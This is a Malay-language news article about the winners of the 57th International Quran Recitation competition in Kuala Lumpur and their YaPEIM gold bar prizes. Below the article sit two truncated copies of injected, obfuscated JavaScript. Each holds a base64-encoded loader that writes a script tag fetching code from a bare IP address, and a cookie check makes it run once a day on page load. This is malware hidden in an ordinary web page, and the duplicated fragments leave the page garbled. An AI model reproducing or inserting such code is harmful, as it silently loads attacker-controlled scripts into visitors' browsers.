YaPEIM » Johan Qari Iran, Qariah Indonesia Menerima Bar Emas YaPEIM RM70,000

Terkini

Johan Qari Iran, Qariah Indonesia Menerima Bar Emas YaPEIM RM70,000

YaPEIM sumbang Bar Emas kepada Johan Qari dan Qariah Tilawah Al-Quran Peringkat Antarabangsa ke-57

KUALA LUMPUR, 14 Jun (Bernama): Qari dari Iran, Mohsen Hassani Kargar dan Qariah dari Indonesia, Asrina Asril Buyong dinobat johan Tilawah al-Quran Peringkat Antarabangsa ke-57 yang berlangsung di Pusat Dagangan Dunia Putra, di sini, malam ini.

Mereka masing-masing menerima hadiah bar emas bernilai RM70,000 sumbangan Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM), piala iringan serta wang tunai RM40,000.

Mohsen yang kali pertama menyertai pertandingan itu memperoleh markah 91.8 peratus, manakala Asrina mendapat 91.6 peratus.

Naib johan qari dimenangi Wan Ainuddin Hilmi Abdullah dari Malaysia dengan markah 91.4 peratus dan tempat ketiga, Numan Makasugat Pimbayaba dari Filipina dengan markah 91 peratus.

Qariah dari Filipina Rahima Panondionga Amerol mendapat tempat kedua dengan markah 88.4 peratus, manakala qariah Malaysia, Siti Husnaa Hassan mengumpul 87 peratus.

Sementara itu, Utusan Malaysia pula melaporkan bagi kategori hafazan al-Quran, peserta dari Malaysia, Farihah Zulkifli berjaya muncul sebagai johan hafizah selepas mengumpul markah 89.5 peratus manakala peserta Qatar, Abdul Aziz Abdullah Ali Al Hamri muncul johan hafiz selepas memperoleh markah 97.63 peratus.

Majlis penyampaian hadiah johan tilawah dan hafazan disempurnakan oleh Sultan Kelantan, Sultan Muhammad V yang diiringi Perdana Menteri, Datuk Seri Najib Tun Razak serta Menteri di Jabatan Perdana Menteri, Datuk Seri Jamil Khir Baharom.

Menurut Pengerusi Jemaah Ha­kim majlis berkenaan, Datuk Othman Mustapha, sebanyak 82 peserta dari 47 negara telah menyertai pertandingan itu meliputi 38 peserta tilawah dan 32 peserta hafazan serta 12 peserta tidak melepasi sa­ringan.

“Secara keseluruhannya, peserta-peserta tilawah telah memberikan bacaan al-Quran yang amat baik dan mengagumkan sehingga pencapaian johan dijarakkan dengan markah sangat tipis.

“Bagi kategori hafazan, para peserta telah menjawab soalan de­ngan baik, malah ada hafazan yang mengagumkan sehingga menitis air mata hakim,” katanya yang juga merupakan Ketua Pengarah Jabatan Kemajuan Islam (Jakim).

Keputusan penuh kategori Qari menyaksikan peserta Malaysia, Wan Ainuddin Hilmi Abdullah mendapat tempat kedua dan peserta Filipina, Numan Makasugat Pimbayaba mendapat tempat ketiga.

Bagi kategori Qariah, kedudukan naib johan menjadi milik peserta Filipina, Rahima Panondiongan Amerol manakala tempat ketiga diraih peserta Malaysia, Siti Husnaa Hassan.

Kategori hafiz menyaksikan tempat kedua diduduki peserta Kuwait, Othman Yused Jazaa Fahad Al-Shalan sementara tempat ketiga diraih peserta Tunisia, Aboulhassen Yahia.

Naib johan bagi kategori hafizah adalah peserta Mauritania, Raghiye Beyah manakala tempat ketiga menjadi milik peserta Tunisia, Mariem Makhlouf.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top